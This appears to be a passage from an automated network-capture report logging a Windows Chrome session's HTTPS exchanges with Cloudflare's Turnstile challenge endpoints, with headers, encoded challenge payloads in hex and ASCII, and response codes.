                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          CF-Challenge: UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:14 UTC16384OUTData Raw: 76 5f 38 66 33 38 39 36 35 64 61 38 31 36 34 33 32 32 3d 25 32 62 44 6c 47 56 24 48 41 63 53 44 48 63 74 41 48 78 69 4f 69 59 74 57 48 6a 69 58 47 48 47 53 71 69 6a 65 74 69 74 47 48 57 38 48 33 69 48 73 69 48 63 6e 69 33 69 6c 32 34 57 57 64 6c 6e 48 65 69 62 32 2d 50 56 57 69 2d 57 69 64 47 48 62 69 4d 47 24 55 69 6b 64 4d 57 32 67 69 4c 51 32 69 35 6d 53 69 5a 69 50 64 68 32 2d 24 4e 42 47 2d 43 63 69 6a 67 4f 56 39 66 6e 36 35 47 47 46 62 69 2b 63 47 62 72 69 34 43 48 61 69 24 44 69 4c 57 6e 48 4c 75 5a 6f 31 69 24 41 69 66 51 2d 36 69 50 2d 6e 67 6c 69 64 70 67 2d 7a 70 77 46 73 6e 6e 64 32 47 34 38 62 74 2d 47 73 69 69 66 54 4f 37 44 44 45 47 69 61 51 38 74 31 2d 6d 43 38 37 65 49 69 75 78 4c 51 72 35 45 58 35 59 59 71 6b 65 44 7a 6e 63 45 31 59 77
                                                                                                                                                                                                                          Data Ascii: v_8f38965da8164322=%2bDlGV$HAcSDHctAHxiOiYtWHjiXGHGSqijetitGHW8H3iHsiHcni3il24WWdlnHeib2-PVWi-WidGHbiMG$UikdMW2giLQ2i5mSiZiPdh2-$NBG-CcijgOV9fn65GGFbi+cGbri4CHai$DiLWnHLuZo1i$AifQ-6iP-nglidpg-zpwFsnnd2G48bt-GsiifTO7DDEGiaQ8t1-mC87eIiuxLQr5EX5YYqkeDzncE1Yw
                                                                                                                                                                                                                          2024-12-17 17:21:14 UTC14754OUTData Raw: 46 67 55 75 46 69 4c 72 39 72 67 5a 74 69 74 47 24 6c 48 62 69 2d 47 4f 69 48 6b 2d 33 47 67 5a 4e 62 32 62 69 48 69 2b 6e 24 62 47 44 44 4d 32 48 41 69 35 69 69 6c 69 59 6e 57 47 2d 6c 69 6d 69 51 47 57 32 69 58 69 4b 47 64 45 69 6a 31 54 47 69 43 2d 53 69 6a 47 64 43 48 34 79 72 47 58 32 24 55 32 66 72 47 69 53 48 32 50 75 4c 35 69 57 69 71 69 2d 47 2d 63 69 4d 78 4c 6c 69 50 47 71 69 6c 4b 24 48 32 78 69 6c 43 69 6b 69 43 69 6d 63 2d 38 69 50 69 48 6c 48 43 69 55 6e 6d 38 24 67 69 78 69 74 68 4f 31 69 2b 67 6d 6c 69 76 69 24 57 2d 32 33 44 69 61 6e 50 34 32 62 69 58 47 57 6e 2d 5a 6e 48 69 53 32 53 33 47 33 32 57 47 2d 38 69 64 32 71 32 69 4a 6c 54 71 6c 34 48 44 69 58 47 6d 75 2d 79 69 75 72 63 72 4b 58 69 61 6e 6d 6c 24 48 32 43 69 6a 6c 24 55 32 24
                                                                                                                                                                                                                          Data Ascii: FgUuFiLr9rgZtitG$lHbi-GOiHk-3GgZNb2biHi+n$bGDDM2HAi5iiliYnWG-limiQGW2iXiKGdEij1TGiC-SijGdCH4yrGX2$U2frGiSH2PuL5iWiqi-G-ciMxLliPGqilK$H2xilCikiCimc-8iPiHlHCiUnm8$gixithO1i+gmlivi$W-23DianP42biXGWn-ZnHiS2S3G32WG-8id2q2iJlTql4HDiXGmu-yiurcrKXianml$H2Cijl$U2$
                                                                                                                                                                                                                          2024-12-17 17:21:15 UTC330INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:14 GMT
                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                          Content-Length: 26284
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-chl-gen: F/WUdEqlrL+pHPm3HxFrTx/UJn9ORraMvlv82kvEPtPRz3qWmpDn3ClVNBAausfPn05JbMkoveYpuDXX$0AyTpmIK53EhxiEc
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f3896a23f31c336-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:15 UTC1039INData Raw: 54 32 35 6c 64 49 74 30 6c 6d 35 6d 6a 5a 35 73 63 47 4b 56 6f 34 4a 69 6d 61 70 31 71 61 57 75 65 61 32 65 66 58 47 78 69 4b 4f 46 69 36 6d 32 6c 6e 5a 32 63 34 32 49 65 35 4b 4b 73 63 47 56 68 4c 71 65 6d 4a 57 54 6f 4b 53 64 70 36 79 6d 6d 73 4c 56 70 5a 53 30 72 71 75 69 79 62 43 72 72 64 4f 76 73 61 43 77 75 72 69 78 31 62 79 39 75 4e 58 64 35 63 71 71 35 73 65 74 71 65 33 75 31 63 76 70 38 4e 61 32 39 66 61 38 2f 63 6a 69 34 50 33 31 2b 2b 4c 43 2b 76 62 56 35 41 37 4d 32 4f 66 73 35 74 6f 54 79 77 41 58 37 51 54 30 44 50 58 6b 37 74 77 66 48 77 30 44 38 42 41 68 41 68 72 61 47 78 55 61 48 69 49 45 49 69 63 74 49 54 55 77 43 53 63 4f 45 68 55 72 46 44 63 4b 42 7a 37 37 47 77 77 62 51 78 59 52 49 66 34 61 42 7a 30 75 49 53 49 77 4a 52 41 73 52 52 34
                                                                                                                                                                                                                          Data Ascii: T25ldIt0lm5mjZ5scGKVo4Jimap1qaWuea2efXGxiKOFi6m2lnZ2c42Ie5KKscGVhLqemJWToKSdp6ymmsLVpZS0rquiybCrrdOvsaCwurix1by9uNXd5cqq5setqe3u1cvp8Na29fa8/cji4P31++LC+vbV5A7M2Ofs5toTywAX7QT0DPXk7twfHw0D8BAhAhraGxUaHiIEIictITUwCScOEhUrFDcKBz77GwwbQxYRIf4aBz0uISIwJRAsRR4
                                                                                                                                                                                                                          2024-12-17 17:21:15 UTC1369INData Raw: 78 62 32 39 7a 63 6e 52 79 67 34 46 38 71 71 71 44 70 6e 35 71 71 6d 2b 4c 62 61 53 44 6b 4a 79 46 69 37 6d 55 6b 4c 57 39 6d 4b 32 35 77 5a 79 77 76 63 57 67 74 38 48 4a 70 4c 71 37 70 4b 7a 42 6f 39 47 73 78 64 62 58 77 38 53 55 6e 62 4b 5a 33 4c 44 63 6f 37 71 39 74 4b 65 2b 77 62 50 41 78 74 66 68 79 2f 48 49 30 4d 2f 6c 38 2b 7a 75 78 2f 6d 37 35 4c 71 32 35 2b 2f 62 38 75 33 55 77 66 6a 54 38 4d 44 43 78 50 54 45 78 67 38 50 43 64 2f 53 2f 4d 7a 4f 79 63 72 5a 45 68 58 33 48 41 2f 75 31 2f 4d 63 49 74 76 6b 42 69 62 66 36 50 6b 71 34 2b 76 6b 2b 41 4d 75 45 42 38 77 45 53 6b 34 47 50 41 74 50 54 49 78 39 2f 63 58 47 2f 34 78 4c 69 46 44 4e 52 30 6a 42 53 77 73 47 52 73 78 43 69 46 47 51 53 38 76 43 54 4d 74 4d 78 6c 4f 4f 44 38 63 4e 54 67 39 57 46
                                                                                                                                                                                                                          Data Ascii: xb29zcnRyg4F8qqqDpn5qqm+LbaSDkJyFi7mUkLW9mK25wZywvcWgt8HJpLq7pKzBo9GsxdbXw8SUnbKZ3LDco7q9tKe+wbPAxtfhy/HI0M/l8+zux/m75Lq25+/b8u3UwfjT8MDCxPTExg8PCd/S/MzOycrZEhX3HA/u1/McItvkBibf6Pkq4+vk+AMuEB8wESk4GPAtPTIx9/cXG/4xLiFDNR0jBSwsGRsxCiFGQS8vCTMtMxlOOD8cNTg9WF
                                                                                                                                                                                                                          2024-12-17 17:21:15 UTC1369INData Raw: 5a 6e 64 38 6f 5a 79 5a 6a 4b 36 67 69 4a 53 72 6c 35 65 45 68 70 78 31 68 6e 61 73 6d 70 71 75 6d 35 53 42 75 5a 32 63 6b 36 4b 62 6f 4a 69 6e 77 4d 47 62 7a 73 36 7a 78 62 4f 6a 7a 4e 69 79 7a 4e 43 79 30 4e 72 5a 31 73 33 6b 34 5a 75 64 79 4b 62 5a 77 62 6e 44 33 74 62 4e 70 72 36 72 34 63 53 78 36 63 33 51 77 74 4f 36 7a 39 44 65 30 37 37 61 2b 50 54 34 34 63 4c 50 38 39 6a 34 34 77 6a 37 45 41 76 34 41 75 6a 30 37 77 66 75 37 2b 6e 68 43 64 55 4e 35 52 2f 59 36 2f 66 61 49 50 54 68 47 76 33 33 39 43 6b 41 2b 50 77 48 44 50 72 73 49 51 67 77 4a 44 67 7a 43 53 6f 52 48 52 67 75 4c 66 59 74 45 54 45 59 4d 52 6b 6e 48 41 63 6b 4a 68 55 66 4c 52 77 39 4b 79 73 70 51 53 6b 77 4b 6b 6f 30 4f 78 67 78 4e 44 6f 7a 4d 45 39 63 4c 31 74 50 5a 6a 31 45 49 6b 4e
                                                                                                                                                                                                                          Data Ascii: Znd8oZyZjK6giJSrl5eEhpx1hnasmpqum5SBuZ2ck6KboJinwMGbzs6zxbOjzNiyzNCy0NrZ1s3k4ZudyKbZwbnD3tbNpr6r4cSx6c3QwtO6z9De077a+PT44cLP89j44wj7EAv4Auj07wfu7+nhCdUN5R/Y6/faIPThGv339CkA+PwHDPrsIQgwJDgzCSoRHRguLfYtETEYMRknHAckJhUfLRw9KyspQSkwKko0OxgxNDozME9cL1tPZj1EIkN
                                                                                                                                                                                                                          2024-12-17 17:21:15 UTC1369INData Raw: 5a 2b 4c 72 4c 4b 42 6b 72 65 6d 68 5a 61 36 71 6f 6d 61 76 61 36 4e 6e 73 43 79 6b 61 4b 41 74 70 57 6d 67 34 79 61 67 59 7a 52 71 4b 4f 4e 72 39 44 46 6f 4b 37 4d 32 4b 79 6c 75 37 57 31 71 71 71 61 72 71 2f 6c 35 62 6a 70 77 4d 6a 48 33 4e 33 74 78 63 44 67 7a 38 57 39 35 63 50 69 78 4f 66 56 30 2b 7a 38 31 37 62 41 7a 76 72 74 37 67 50 6d 77 50 4c 46 43 39 6e 33 44 65 4d 47 35 63 7a 46 7a 2b 67 45 35 63 6f 54 42 78 6a 4f 35 2f 58 74 39 78 48 59 34 4e 72 77 38 67 55 71 2b 51 45 6e 43 79 51 4c 4a 69 59 74 41 2b 55 45 2f 76 54 74 43 66 55 74 43 43 58 30 39 54 51 70 2b 50 6b 30 4c 66 7a 2b 52 44 45 42 41 30 51 31 42 51 63 4a 4f 51 6b 4c 55 31 4e 4e 4a 42 64 42 45 52 4d 4f 44 78 35 57 57 54 78 67 57 68 34 63 4f 47 42 6d 49 43 6c 4b 61 69 51 74 50 6d 34 6f
                                                                                                                                                                                                                          Data Ascii: Z+LrLKBkremhZa6qomava6NnsCykaKAtpWmg4yagYzRqKONr9DFoK7M2Kylu7W1qqqarq/l5bjpwMjH3N3txcDgz8W95cPixOfV0+z817bAzvrt7gPmwPLFC9n3DeMG5czFz+gE5coTBxjO5/Xt9xHY4Nrw8gUq+QEnCyQLJiYtA+UE/vTtCfUtCCX09TQp+Pk0Lfz+RDEBA0Q1BQcJOQkLU1NNJBdBERMODx5WWTxgWh4cOGBmIClKaiQtPm4o
                                                                                                                                                                                                                          2024-12-17 17:21:15 UTC1369INData Raw: 57 6a 67 71 69 4d 63 35 75 56 6c 6f 36 51 67 58 70 33 70 4c 36 59 66 36 65 68 6e 4a 32 57 68 72 79 62 77 4b 66 41 6e 71 2b 6a 6f 71 54 59 6b 72 43 32 78 39 47 76 34 62 6e 69 76 39 65 75 74 37 4f 33 6e 4f 62 44 34 38 76 44 35 63 54 75 36 50 48 64 36 4f 69 34 31 62 57 32 32 4f 62 37 74 62 7a 70 2f 73 48 37 77 37 2f 44 32 4e 48 58 34 65 4c 61 33 4d 30 45 77 2f 44 54 35 4e 44 4f 36 2b 38 4c 46 78 45 50 32 78 73 56 47 2b 34 52 41 78 33 76 49 78 45 69 36 53 66 70 4c 4f 6b 62 37 67 48 74 43 78 4d 74 38 51 30 55 47 65 38 52 4e 67 37 34 50 76 58 2b 44 30 41 44 48 50 63 30 51 69 6b 55 4f 45 49 5a 47 53 5a 4e 54 51 51 72 44 79 63 67 4c 67 35 4b 49 78 45 61 45 78 35 62 53 6b 73 71 59 52 70 64 4d 55 42 5a 4b 44 56 43 59 6a 30 38 58 53 34 71 4c 6a 78 44 61 7a 35 50 54
                                                                                                                                                                                                                          Data Ascii: WjgqiMc5uVlo6QgXp3pL6Yf6ehnJ2WhrybwKfAnq+joqTYkrC2x9Gv4bniv9eut7O3nObD48vD5cTu6PHd6Oi41bW22Ob7tbzp/sH7w7/D2NHX4eLa3M0Ew/DT5NDO6+8LFxEP2xsVG+4RAx3vIxEi6SfpLOkb7gHtCxMt8Q0UGe8RNg74PvX+D0ADHPc0QikUOEIZGSZNTQQrDycgLg5KIxEaEx5bSksqYRpdMUBZKDVCYj08XS4qLjxDaz5PT
                                                                                                                                                                                                                          2024-12-17 17:21:15 UTC1369INData Raw: 54 71 4a 70 36 6f 6e 71 55 6a 34 4b 5a 6b 62 6a 47 6c 70 65 39 69 70 75 61 76 70 4b 6b 6f 61 2b 56 31 61 48 59 32 62 47 33 70 38 36 78 76 74 54 53 30 38 54 5a 34 73 53 33 74 75 4b 2b 7a 4f 4b 34 32 73 2b 2f 77 39 54 52 39 65 37 48 31 75 65 36 35 73 7a 73 38 63 72 4c 75 64 50 57 31 50 54 62 31 63 63 4a 2b 65 58 63 43 38 37 62 33 4e 72 4c 35 50 58 7a 43 77 58 78 44 68 63 4d 36 75 63 50 2b 76 30 57 47 2f 55 44 47 52 59 52 41 2b 49 4c 34 76 7a 33 36 67 4c 35 49 53 2f 2b 41 43 62 79 42 41 4d 6e 2b 67 30 4b 47 50 30 2b 43 6b 46 43 47 69 41 51 4e 79 4d 6d 50 78 6b 35 4a 6b 49 2f 50 68 38 67 45 45 45 31 49 79 6c 46 4f 45 31 50 4b 53 78 52 53 7a 34 59 59 6d 4a 52 4d 44 38 34 50 45 4a 5a 59 6c 6b 32 62 55 39 75 50 44 78 41 59 54 52 31 54 45 31 46 56 32 74 73 58 58
                                                                                                                                                                                                                          Data Ascii: TqJp6onqUj4KZkbjGlpe9ipuavpKkoa+V1aHY2bG3p86xvtTS08TZ4sS3tuK+zOK42s+/w9TR9e7H1ue65szs8crLudPW1PTb1ccJ+eXcC87b3NrL5PXzCwXxDhcM6ucP+v0WG/UDGRYRA+IL4vz36gL5IS/+ACbyBAMn+g0KGP0+CkFCGiAQNyMmPxk5JkI/Ph8gEEE1IylFOE1PKSxRSz4YYmJRMD84PEJZYlk2bU9uPDxAYTR1TE1FV2tsXX
                                                                                                                                                                                                                          2024-12-17 17:21:15 UTC1369INData Raw: 6f 34 65 70 70 37 36 59 72 4b 7a 42 69 37 47 78 72 71 7a 44 73 38 6e 4b 77 37 6d 33 79 73 6d 37 6c 36 6a 4f 75 72 43 77 78 63 4f 7a 33 74 44 48 33 72 6a 61 7a 4d 79 38 76 4e 44 6d 77 4e 33 54 72 38 44 6b 31 2b 32 37 35 39 33 4b 32 4f 7a 67 7a 37 76 73 34 2b 4f 2f 38 4f 6e 58 79 2f 58 6d 32 38 76 35 38 4d 76 63 2f 76 50 6a 7a 2f 6e 34 44 2b 6a 6f 2f 42 49 50 44 51 4c 76 34 78 4d 46 47 69 63 59 43 67 63 46 47 67 30 69 35 78 49 51 36 76 4d 6a 46 41 55 42 4a 78 4d 49 2b 79 6f 64 44 50 63 71 49 44 5a 44 4c 69 51 41 46 52 55 70 41 77 51 38 4c 45 4d 5a 4f 54 45 77 51 30 51 30 44 6a 46 47 4f 45 38 6c 53 7a 30 58 47 45 31 41 4d 53 31 50 50 7a 52 6e 56 30 68 49 61 31 68 4d 4b 44 31 53 55 6b 42 6e 51 56 56 71 63 32 52 5a 53 44 68 71 58 54 64 2f 61 31 74 51 67 33 4a
                                                                                                                                                                                                                          Data Ascii: o4epp76YrKzBi7GxrqzDs8nKw7m3ysm7l6jOurCwxcOz3tDH3rjazMy8vNDmwN3Tr8Dk1+27593K2Ozgz7vs4+O/8OnXy/Xm28v58Mvc/vPjz/n4D+jo/BIPDQLv4xMFGicYCgcFGg0i5xIQ6vMjFAUBJxMI+yodDPcqIDZDLiQAFRUpAwQ8LEMZOTEwQ0Q0DjFGOE8lSz0XGE1AMS1PPzRnV0hIa1hMKD1SUkBnQVVqc2RZSDhqXTd/a1tQg3J
                                                                                                                                                                                                                          2024-12-17 17:21:15 UTC1369INData Raw: 49 6d 71 78 61 71 4e 69 63 61 67 6b 39 50 45 30 4a 6d 32 7a 71 69 62 74 63 7a 59 6f 62 37 57 73 4b 44 5a 78 75 48 43 77 4c 7a 4a 76 4b 58 67 34 4d 71 2f 72 38 57 30 35 62 66 49 74 4f 7a 55 36 39 79 31 39 41 48 51 75 66 54 30 33 74 50 44 39 4f 50 6d 34 39 54 71 35 38 76 67 7a 41 58 75 44 4f 38 54 46 52 6e 57 30 52 55 54 33 42 73 50 38 74 37 2b 46 2f 44 67 47 67 63 63 41 77 45 4a 43 75 6e 36 43 79 4d 50 48 78 38 42 38 65 34 55 4a 52 51 52 48 51 6e 34 39 54 4d 4e 2f 54 59 6a 50 42 38 64 4f 79 59 48 46 79 64 44 4b 7a 74 4c 48 51 38 4c 4d 45 45 77 4c 53 30 6c 49 69 64 4f 4f 68 77 56 53 30 38 69 51 45 42 52 51 44 31 6a 4e 53 67 68 56 31 73 75 53 32 4d 39 4d 43 6c 66 5a 44 5a 55 56 47 56 55 55 57 74 4a 50 44 56 72 63 45 4a 66 64 31 46 45 50 58 4e 31 53 6d 68 6f
                                                                                                                                                                                                                          Data Ascii: ImqxaqNicagk9PE0Jm2zqibtczYob7WsKDZxuHCwLzJvKXg4Mq/r8W05bfItOzU69y19AHQufT03tPD9OPm49Tq58vgzAXuDO8TFRnW0RUT3BsP8t7+F/DgGgccAwEJCun6CyMPHx8B8e4UJRQRHQn49TMN/TYjPB8dOyYHFydDKztLHQ8LMEEwLS0lIidOOhwVS08iQEBRQD1jNSghV1suS2M9MClfZDZUVGVUUWtJPDVrcEJfd1FEPXN1Smho


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          27192.168.2.1849810104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:16 UTC597OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:16 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:16 GMT
                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-chl-out: camdjefsWBnIVO3mIeQ6uodtj+Vxo0VFiYA=$6p1qtzV2ZHFyiitc
                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f3896afff9e0fa0-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:16 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                          Data Ascii: invalid


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          28192.168.2.1849812104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Content-Length: 33531
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          CF-Challenge: UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC16384OUTData Raw: 76 5f 38 66 33 38 39 36 35 64 61 38 31 36 34 33 32 32 3d 25 32 62 44 6c 47 56 24 48 41 63 53 44 48 63 74 41 48 78 69 4f 69 59 74 57 48 6a 69 58 47 48 47 53 71 69 6a 65 74 69 74 47 48 57 38 48 33 69 48 73 69 48 63 6e 69 33 69 6c 32 34 57 57 64 6c 6e 48 65 69 62 32 2d 50 56 57 69 2d 57 69 64 47 48 62 69 4d 47 24 55 69 6b 64 4d 57 32 67 69 4c 51 32 69 35 6d 53 69 5a 69 50 64 68 32 2d 24 4e 42 47 2d 43 63 69 6a 67 4f 56 39 66 6e 36 35 47 47 46 62 69 2b 63 47 62 72 69 34 43 48 61 69 24 44 69 4c 57 6e 48 4c 75 5a 6f 31 69 24 41 69 66 51 2d 36 69 50 2d 6e 67 6c 69 64 70 67 2d 7a 70 77 46 73 6e 6e 64 32 47 34 38 62 74 2d 47 73 69 69 66 54 4f 37 44 44 45 47 69 61 51 38 74 31 2d 6d 43 38 37 65 49 69 75 78 4c 51 72 35 45 58 35 59 59 71 6b 65 44 7a 6e 63 45 31 59 77
                                                                                                                                                                                                                          Data Ascii: v_8f38965da8164322=%2bDlGV$HAcSDHctAHxiOiYtWHjiXGHGSqijetitGHW8H3iHsiHcni3il24WWdlnHeib2-PVWi-WidGHbiMG$UikdMW2giLQ2i5mSiZiPdh2-$NBG-CcijgOV9fn65GGFbi+cGbri4CHai$DiLWnHLuZo1i$AifQ-6iP-nglidpg-zpwFsnnd2G48bt-GsiifTO7DDEGiaQ8t1-mC87eIiuxLQr5EX5YYqkeDzncE1Yw
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC16384OUTData Raw: 46 67 55 75 46 69 4c 72 39 72 67 5a 74 69 74 47 24 6c 48 62 69 2d 47 4f 69 48 6b 2d 33 47 67 5a 4e 62 32 62 69 48 69 2b 6e 24 62 47 44 44 4d 32 48 41 69 35 69 69 6c 69 59 6e 57 47 2d 6c 69 6d 69 51 47 57 32 69 58 69 4b 47 64 45 69 6a 31 54 47 69 43 2d 53 69 6a 47 64 43 48 34 79 72 47 58 32 24 55 32 66 72 47 69 53 48 32 50 75 4c 35 69 57 69 71 69 2d 47 2d 63 69 4d 78 4c 6c 69 50 47 71 69 6c 4b 24 48 32 78 69 6c 43 69 6b 69 43 69 6d 63 2d 38 69 50 69 48 6c 48 43 69 55 6e 6d 38 24 67 69 78 69 74 68 4f 31 69 2b 67 6d 6c 69 76 69 24 57 2d 32 33 44 69 61 6e 50 34 32 62 69 58 47 57 6e 2d 5a 6e 48 69 53 32 53 33 47 33 32 57 47 2d 38 69 64 32 71 32 69 4a 6c 54 71 6c 34 48 44 69 58 47 6d 75 2d 79 69 75 72 63 72 4b 58 69 61 6e 6d 6c 24 48 32 43 69 6a 6c 24 55 32 24
                                                                                                                                                                                                                          Data Ascii: FgUuFiLr9rgZtitG$lHbi-GOiHk-3GgZNb2biHi+n$bGDDM2HAi5iiliYnWG-limiQGW2iXiKGdEij1TGiC-SijGdCH4yrGX2$U2frGiSH2PuL5iWiqi-G-ciMxLliPGqilK$H2xilCikiCimc-8iPiHlHCiUnm8$gixithO1i+gmlivi$W-23DianP42biXGWn-ZnHiS2S3G32WG-8id2q2iJlTql4HDiXGmu-yiurcrKXianml$H2Cijl$U2$
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC763OUTData Raw: 74 2d 69 2d 45 31 6d 4e 6a 41 79 24 69 35 4e 39 51 36 53 39 6e 43 6b 24 67 34 32 47 38 24 4a 2b 56 6b 47 56 6e 2d 39 64 4e 4e 61 58 35 77 76 69 51 41 48 35 37 24 32 4a 4f 4f 48 52 33 4e 48 4f 42 59 7a 69 44 52 6c 24 61 77 45 37 6b 4e 49 35 37 69 47 42 4e 6b 4b 67 7a 68 6c 51 2b 69 32 43 6e 6e 63 65 72 6b 62 69 47 5a 6c 77 2d 65 48 36 47 62 68 24 64 69 68 32 4f 44 48 34 69 33 32 69 47 48 59 73 74 54 5a 41 24 67 69 54 39 36 63 56 79 69 43 58 50 6c 69 2d 6b 73 69 6c 39 67 59 77 61 69 4c 6e 48 74 69 72 48 4f 42 7a 6f 77 5a 79 32 37 4e 6e 2b 48 64 5a 37 7a 34 79 44 32 57 43 61 2b 43 32 4d 6f 6f 69 4a 6c 71 67 42 46 57 44 54 76 76 63 34 71 4e 6f 79 69 6c 39 67 62 42 43 69 6e 5a 61 4c 2b 47 73 6b 32 2d 63 2b 65 75 64 61 5a 66 5a 56 63 64 45 67 45 6a 2b 2b 6f 74
                                                                                                                                                                                                                          Data Ascii: t-i-E1mNjAy$i5N9Q6S9nCk$g42G8$J+VkGVn-9dNNaX5wviQAH57$2JOOHR3NHOBYziDRl$awE7kNI57iGBNkKgzhlQ+i2CnncerkbiGZlw-eH6Gbh$dih2ODH4i32iGHYstTZA$giT96cVyiCXPli-ksil9gYwaiLnHtirHOBzowZy27Nn+HdZ7z4yD2WCa+C2MooiJlqgBFWDTvvc4qNoyil9gbBCinZaL+Gsk2-c+eudaZfZVcdEgEj++ot
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC1312INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:19 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Content-Length: 4544
                                                                                                                                                                                                                          Connection: close
